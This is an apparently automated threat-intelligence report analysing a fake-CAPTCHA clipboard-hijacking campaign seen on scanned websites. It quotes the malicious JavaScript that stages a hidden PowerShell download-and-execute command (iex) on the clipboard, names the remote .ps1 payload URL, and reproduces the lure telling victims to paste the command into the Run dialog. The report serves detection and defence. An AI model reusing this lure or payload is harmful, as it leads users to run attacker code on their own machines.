← Back to Analysis

Emerging ClickGrab Campaign: Advanced Analysis of 2025-12-21 Attack Patterns

📅 Published: December 21, 2025 👨‍💻 Author: ClickGrab Threat Intelligence Team 📖 12 min read
19Sites
11%Detection
1PS Downloads

ClickGrab Threat Analysis Report - 2025-12-21

Generated on 2025-12-21 02:53:31

Executive Summary

  • Total sites analyzed: 19
  • Sites with malicious content: 2
  • Unique domains encountered: 18
  • Total URLs extracted: 67
  • PowerShell download attempts: 1
  • Clipboard manipulation instances: 8

Domain Analysis

Most Frequently Encountered Domains

  • www.webgo.de: 10 occurrences
  • godprox.cc: 8 occurrences
  • svetvip.ru: 8 occurrences
  • api.whatsapp.com: 6 occurrences
  • www.google.com: 4 occurrences
  • mc.yandex.ru: 4 occurrences
  • launchpad.net: 3 occurrences
  • httpd.apache.org: 3 occurrences
  • bugs.launchpad.net: 3 occurrences
  • t.me: 3 occurrences
  • use.fontawesome.com: 2 occurrences
  • vk.com: 2 occurrences
  • www.facebook.com: 2 occurrences
  • ok.ru: 2 occurrences
  • twitter.com: 2 occurrences

URL Pattern Analysis

reCAPTCHA imagery

2 occurrences across 1 distinct URLs

  • https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (2 times)

Font resources

2 occurrences across 1 distinct URLs

  • https://use.fontawesome.com/releases/v5.0.0/css/all.css (2 times)

CDN hosted scripts

1 occurrences across 1 distinct URLs

  • https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 (1 times)

Google resources

4 occurrences across 3 distinct URLs

  • https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (2 times)
  • https://www.google.com/intl/en/policies/privacy/ (1 times)
  • https://www.google.com/intl/en/policies/terms/ (1 times)

Suspicious Keyword Analysis

Total Keywords Found: 37 (18 unique)

Keyword Categories

Social Engineering

12 unique keywords

  • Verification ID
  • To better prove you are not a robot
  • Robot
  • Verify You Are Human
  • I am not a robot
  • CAPTCHA Verification
  • verification_id
  • verification-id
  • Verification Hash
  • verification
  • ...and 2 more

System Commands

2 unique keywords

  • exec(
  • exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}eise if (n.appName == "Netscape"){rv = ii;re = new RegExp("Trident/.*rv:([0-9]+[\.0-9]*)");if (re.exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}}return rv;}})(window, document, navigator)

Verification Text

2 unique keywords

  • hidden
  • Hidden

Technical Terms

2 unique keywords

  • failed_to_retrieve
  • iex

Most Frequent Keywords

  • robot: 4 occurrences
  • hidden: 4 occurrences
  • failed_to_retrieve: 3 occurrences
  • CAPTCHA Verification: 2 occurrences
  • I am not a robot: 2 occurrences
  • Robot: 2 occurrences
  • Verification: 2 occurrences
  • verification: 2 occurrences
  • verification-id: 2 occurrences
  • verification_id: 2 occurrences
  • To better prove you are not a robot: 2 occurrences
  • iex: 2 occurrences
  • exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}eise if (n.appName == "Netscape"){rv = ii;re = new RegExp("Trident/.rv:([0-9]+[.0-9])");if (re.exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}}return rv;}})(window, document, navigator): 2 occurrences
  • exec(: 2 occurrences
  • Verification Hash: 1 occurrences

Similar Keyword Patterns

Groups of keywords that appear to be variations of the same theme:

Group 1: CAPTCHA Verification, Verification, verification

Group 2: Verification Hash, verification-id, verification_id, Verification ID

Group 3: Robot, robot

Group 4: Hidden, hidden

JavaScript Obfuscation Analysis

Obfuscation Sophistication Score: 0/7

Potential Base64 Encoded Content

These strings may contain encoded malicious payloads:

  • 03045b9e38005345ee2d4baa79f44bf1
  • /bitrix/tools/captcha
  • 0d2d848bb160c24ce963f7211c696f7a
  • com/recaptcha/about/images/reCAPTCHA
  • 04603bdafe070378e8d5def043e45906

Clipboard Manipulation Analysis

Detected clipboard manipulation in 8 instances.

Document.Execcommand Copy

Found in 6 snippets (75.0% of clipboard code)

Examples:

document.execCommand("copy")

Textarea Manipulation

Found in 6 snippets (75.0% of clipboard code)

Examples:

ipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"

Complete Malicious Functions

Function 1:

function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }

Clipboard Attack Flow Analysis

Attack Sophistication: 6/7 components detected Total Technique Instances: 27

Attack Flow Components

The following components show how the clipboard attack is executed:

Element Creation

Creating temporary DOM elements

Instances: 2 Examples: createElement("textarea"

Content Injection

Injecting malicious content into elements

Instances: 3 Examples: .value =, .textContent =

DOM Manipulation

Adding elements to the DOM

Instances: 6 Examples: append(, body.append

Selection Methods

Selecting content for copying

Instances: 6 Examples: .select()

Clipboard Operations

Executing clipboard copy operations

Instances: 6 Examples: execCommand("copy"

Cleanup Operations

Removing temporary elements

Instances: 4 Examples: removeChild

Malicious Payload Construction

How the final clipboard payload is assembled:

Command Concatenation

Instances: 1 Examples: - commandToRun +

Verification Text

Instances: 1 Examples: - "copy"); document.body.removeChild(tempTextA... ...ck", function (event) { event.preventDefault(); checkboxBtn.disabled = true; runClickedCheckboxEffects(); }); } } function runClickedCheckboxEffects() { hideCaptchaCheckbox(); setTimeout(function(){ showCaptchaLoading(); },500); setTimeout(function(){ showVerifyWindow(); },900) } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; checkboxBtnSpinner.style.animation = "spin 1s linear infinite"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.opacity = "0"; checkboxBtnSpinner.style.animation = "none"; setTimeout(function() { checkboxBtnSpinner.style.visibility = "hidden"; }, 500); } function hideCaptchaCheckbox() { checkboxBtn.style.visibility = "hidden"; checkboxBtn.style.opacity = "0"; } function showCaptchaCheckbox() { checkboxBtn.style.width = "100%"; checkboxBtn.style.height = "100%"; checkboxBtn.style.borderRadius = "2px"; checkboxBtn.style.margin = "21px 0 0 12px"; checkboxBtn.style.opacity = "1"; } function hideCaptchaCheckbox() { checkboxBtn.style.width = "4px"; checkboxBtn.style.height = "4px"; checkboxBtn.style.borderRadius = "50%"; checkboxBtn.style.marginLeft = "25px"; checkboxBtn.style.marginTop = "33px"; checkboxBtn.style.opacity = "0"; } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.visibility = "hidden"; checkboxBtnSpinner.style.opacity = "0"; } function generateRandomNumber() { const min = 1000; const max = 9999; return Math.floor(Math.random() * (max - min + 1) + min).toString(); } function closeverifywindow() { verifywindow.style.display = "none"; verifywindow.style.visibility = "hidden"; verifywindow.style.opacity = "0"; showCaptchaCheckbox(); hideCaptchaLoading(); checkboxBtn.disabled = false; } function isverifywindowVisible() { return verifywindow.style.display !== "none" && verifywindow.style.display !== ""; } function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); } function stageClipboard(commandToRun, verification_id){ const suffix = " # " const ploy = "✠''I am not a robot - reCAPTCHA Verification Hash: " const end = "''" const textToCopy = commandToRun + suffix + ploy + verification_id + end setClipboardCopyData(textToCopy); } function showVerifyWindow()... ...dy.append(tempTextArea); tempTextArea.select(); document.execCommand("copy");... ...32.ps1 | iex' -WindowStyle Hidden\""; const commandToRun = "powershell " + htaPath; stageClipboa... ...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText... ...k", function (event) { event.preventDefault(); checkboxBtn.disabled = true; runClickedCheckboxEffects(); }); } } function runClickedCheckboxEffects() { hideCaptchaCheckbox(); setTimeout(function(){ showCaptchaLoading(); },500); setTimeout(function(){ showVerifyWindow(); },900) } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; checkboxBtnSpinner.style.animation = "spin 1s linear infinite"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.opacity = "0"; checkboxBtnSpinner.style.animation = "none"; setTimeout(function() { checkboxBtnSpinner.style.visibility = "hidden"; }, 500); } function hideCaptchaCheckbox() { checkboxBtn.style.visibility = "hidden"; checkboxBtn.style.opacity = "0"; } function showCaptchaCheckbox() { checkboxBtn.style.width = "100%"; checkboxBtn.style.height = "100%"; checkboxBtn.style.borderRadius = "2px"; checkboxBtn.style.margin = "0"; checkboxBtn.style.opacity = "1"; } function hideCaptchaCheckbox() { checkboxBtn.style.width = "4px"; checkboxBtn.style.height = "4px"; checkboxBtn.style.borderRadius = "50%"; checkboxBtn.style.marginLeft = "25px"; checkboxBtn.style.marginTop = "33px"; checkboxBtn.style.opacity = "0"; } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.visibility = "hidden"; checkboxBtnSpinner.style.opacity = "0"; } function generateRandomNumber() { const min = 1000; const max = 9999; return Math.floor(Math.random() * (max - min + 1) + min).toString(); } function closeverifywindow() { verifywindow.style.display = "none"; verifywindow.style.visibility = "hidden"; verifywindow.style.opacity = "0"; showCaptchaCheckbox(); hideCaptchaLoading(); checkboxBtn.disabled = false; } function isverifywindowVisible() { return verifywindow.style.display !== "none" && verifywindow.style.display !== ""; } function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); } function stageClipboard(commandToRun, verification_id){ const suffix = " # " const ploy = "✠''I am not a robot - reCAPTCHA Verification ID: " const end = "''" const textToCopy = commandToRun setClipboardCopyData(textToCopy); } function showVerifyWindow() {... ...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy");... ...cation-id').textContent = verification_id; const commandToRun =POWerShEll -W h "[Text.Encoding]::UTF8.GetString... ...="" id="spinner">

Complete these Verification Steps

To better prove you are not a robot, please:

  1. Press & hold the Windows Key + R.
  2. In the verification window, press Ctrl + V.
  3. Press Enter on your keyboard to finish.

You will observe and agree:
✠"I am not a robot - reCAPTCHA Verification Hash: 1110"

<footer class="verify-container verif...
Perform the steps above to finish verification.

I'm not a robot

...

Verify You Are Human

Please verify that you are a human to continue.

Complete these Verification Steps

To better prove you are not a robot, please:

  1. Press & hold the Windows Key + R.
  2. In the verification window, press Ctrl + V.
  3. Press Enter on your keyboard to finish.

You will observe and agree:
✠"I am not a robot - reCAPTCHA Verification ID: 146820"

<footer class="verify-container veri...
Perform the steps above to finish verification.
Verify You Are Human

Verify You Are Human

I'm not a robot

CAPTCHA CAPTCHA CAPTCHA <img id="order_cImg_new_387880" src="/bitrix/tools/captcha.php?captcha_sid=0d2d848bb160c24ce963f7211c696f7a" width="127" height="30" alt="CAPTCHA"`

Hash Generation

Instances: 1 Examples: - verification_id){ const suffix = " # " const ploy = "✠''I am not a robot - reCAPTCHA Verification Hash: " const end = "''" const textToCopy = commandToRun + suffix + ploy + verification_id + end setClipboardCopyData(textToCopy); } function showVerifyWindow()... ...dy.append(tempTextArea); tempTextArea.select(); document.execCommand("copy");... ...32.ps1 | iex' -WindowStyle Hidden\""; const commandToRun = "powershell " + htaPath; stageClipboa... ...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText... ...k", function (event) { event.preventDefault(); checkboxBtn.disabled = true; runClickedCheckboxEffects(); }); } } function runClickedCheckboxEffects() { hideCaptchaCheckbox(); setTimeout(function(){ showCaptchaLoading(); },500); setTimeout(function(){ showVerifyWindow(); },900) } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; checkboxBtnSpinner.style.animation = "spin 1s linear infinite"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.opacity = "0"; checkboxBtnSpinner.style.animation = "none"; setTimeout(function() { checkboxBtnSpinner.style.visibility = "hidden"; }, 500); } function hideCaptchaCheckbox() { checkboxBtn.style.visibility = "hidden"; checkboxBtn.style.opacity = "0"; } function showCaptchaCheckbox() { checkboxBtn.style.width = "100%"; checkboxBtn.style.height = "100%"; checkboxBtn.style.borderRadius = "2px"; checkboxBtn.style.margin = "0"; checkboxBtn.style.opacity = "1"; } function hideCaptchaCheckbox() { checkboxBtn.style.width = "4px"; checkboxBtn.style.height = "4px"; checkboxBtn.style.borderRadius = "50%"; checkboxBtn.style.marginLeft = "25px"; checkboxBtn.style.marginTop = "33px"; checkboxBtn.style.opacity = "0"; } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.visibility = "hidden"; checkboxBtnSpinner.style.opacity = "0"; } function generateRandomNumber() { const min = 1000; const max = 9999; return Math.floor(Math.random() * (max - min + 1) + min).toString(); } function closeverifywindow() { verifywindow.style.display = "none"; verifywindow.style.visibility = "hidden"; verifywindow.style.opacity = "0"; showCaptchaCheckbox(); hideCaptchaLoading(); checkboxBtn.disabled = false; } function isverifywindowVisible() { return verifywindow.style.display !== "none" && verifywindow.style.display !== ""; } function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); } function stageClipboard(commandToRun, verification_id){ const suffix = " # " const ploy = "✠''I am not a robot - reCAPTCHA Verification ID: " const end = "''" const textToCopy = commandToRun setClipboardCopyData(textToCopy); } function showVerifyWindow() {... ...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy");... ...cation-id').textContent = verification_id; const commandToRun =POWerShEll -W h "[Text.Encoding]::UTF8.GetString... ...="" id="spinner">

Complete these Verification Steps

To better prove you are not a robot, please:

  1. Press & hold the Windows Key + R.
  2. In the verification window, press Ctrl + V.
  3. Press Enter on your keyboard to finish.

You will observe and agree:
✠"I am not a robot - reCAPTCHA Verification Hash: 1110"

<footer class="verify-container verif...
Perform the steps above to finish verification.

I'm not a robot

...

Verify You Are Human

Please verify that you are a human to continue.

Complete these Verification Steps

To better prove you are not a robot, please:

  1. Press & hold the Windows Key + R.
  2. In the verification window, press Ctrl + V.
  3. Press Enter on your keyboard to finish.

You will observe and agree:
✠"I am not a robot - reCAPTCHA Verification ID: 146820"

<footer class="verify-container veri...
Perform the steps above to finish verification.
Verify You Are Human

Verify You Are Human

I'm not a robot

CAPTCHA CAPTCHA CAPTCHA <img id="order_cImg_new_387880" src="/bitrix/tools/captcha.php?captcha_sid=0d2d848bb160c24ce963f7211c696f7a" wid`

Comment Injection

Instances: 2 Examples: - # " const ploy = "

Attack Pattern Reconstruction

Malicious Download Sources

  • https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1

Key Findings

  1. Prevalence: 10.5% of analyzed sites contained malicious content
  2. Primary Attack Vector: Fake CAPTCHA verification leading to clipboard hijacking
  3. Target Platform: Windows systems via PowerShell execution
  4. Social Engineering: Sophisticated UI mimicking legitimate Google reCAPTCHA

Recommendations

  1. User Education: Warn users about fake CAPTCHA verification schemes
  2. Clipboard Monitoring: Implement clipboard monitoring for suspicious PowerShell commands
  3. URL Filtering: Block known malicious domains identified in this analysis
  4. PowerShell Execution Policy: Restrict PowerShell execution in corporate environments